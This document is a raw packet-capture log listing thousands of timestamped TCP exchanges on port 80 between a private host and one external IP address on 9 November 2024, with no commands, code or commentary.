Nov 9, 2024 02:47:35.860739946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860754013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860765934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860769033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860778093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860788107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860821009 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860932112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860944033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860955000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860966921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860977888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860980988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860999107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861030102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861031055 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861042976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861053944 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861064911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861078978 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861083031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861093998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861093998 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861105919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861118078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861125946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861185074 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861311913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861332893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861341000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861368895 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861382961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861445904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861458063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861468077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861485958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861521959 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861526012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861536026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861546993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861557961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861568928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861577988 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861582041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861597061 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861618996 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861660004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861670971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861690998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861701965 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861715078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861722946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861722946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861733913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861743927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861756086 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861768007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861784935 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861846924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861859083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861869097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861891031 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861905098 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.861965895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861984015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.861995935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862034082 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862035036 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862047911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862059116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862076998 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862106085 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862201929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862214088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862230062 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862240076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862250090 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862251997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862263918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862283945 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862313986 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862346888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862356901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862363100 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862368107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862371922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862389088 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862399101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862406969 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862411976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862435102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862447977 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862468958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862481117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862484932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862495899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862546921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862546921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862575054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862586975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862597942 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862626076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862629890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862642050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862648964 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862653017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862675905 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862699986 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862701893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862737894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862754107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862778902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862781048 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862808943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862819910 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862823963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862837076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862860918 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862886906 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.862967014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.862977982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863008976 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863101006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863111973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863140106 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863168955 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863171101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863183022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863194942 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863205910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863234043 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863245964 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863296986 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863320112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863332033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863337994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863341093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863343000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863348961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863353968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863358974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863363028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863364935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863370895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863384962 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863428116 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863549948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863593102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863605022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863636971 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863662958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863708019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863719940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863737106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863751888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863758087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863765001 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863771915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863781929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863782883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863795042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863806009 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863806963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863826036 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863836050 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863837004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863850117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863861084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863867998 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863873005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863884926 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863889933 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863914967 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863922119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863933086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863934994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863965988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863971949 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.863979101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863990068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.863992929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864011049 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864026070 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864097118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864140034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864151001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864161968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864167929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864201069 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864222050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864234924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864244938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864255905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864273071 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864295959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864308119 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864308119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864322901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864351034 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864363909 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864418983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864455938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864460945 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864469051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864492893 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864525080 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864564896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864577055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864587069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864597082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864608049 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864608049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864619970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864624023 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864633083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864643097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864653111 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864670038 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864691973 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864897013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864938974 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.864964008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864981890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.864991903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865008116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865009069 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865020990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865029097 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865032911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865045071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865056992 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865077019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865120888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865139961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865144968 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865151882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865159035 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865180969 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865195990 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865216970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865228891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865272045 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865504980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865555048 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865715981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865735054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865746021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865756035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865767002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865777016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865786076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865788937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865803957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865816116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865818024 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865828037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865837097 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865839958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865852118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865861893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865874052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865885019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865890980 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865890980 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865895987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865907907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865915060 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865921021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.865943909 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.865963936 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866050005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866066933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866077900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866094112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866096973 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866106987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866117954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866122961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866130114 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866148949 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866157055 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866162062 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866173983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866180897 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866185904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866197109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866209030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866219044 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866228104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866230965 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866238117 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866251945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866264105 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866265059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866281986 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866281986 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866295099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866303921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866313934 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866313934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866328001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866338015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866345882 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866354942 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866365910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866364956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866379023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866389990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866391897 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866425037 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866449118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866523981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866535902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866545916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866566896 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866590977 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866641045 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866652966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866663933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866674900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866686106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866695881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866695881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866717100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866735935 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866838932 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866849899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866868019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866879940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866885900 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866893053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866900921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866906881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866918087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866929054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866940975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866954088 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866957903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.866982937 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.866992950 CET	80	52982	77.220.212.32	192.168.2.7
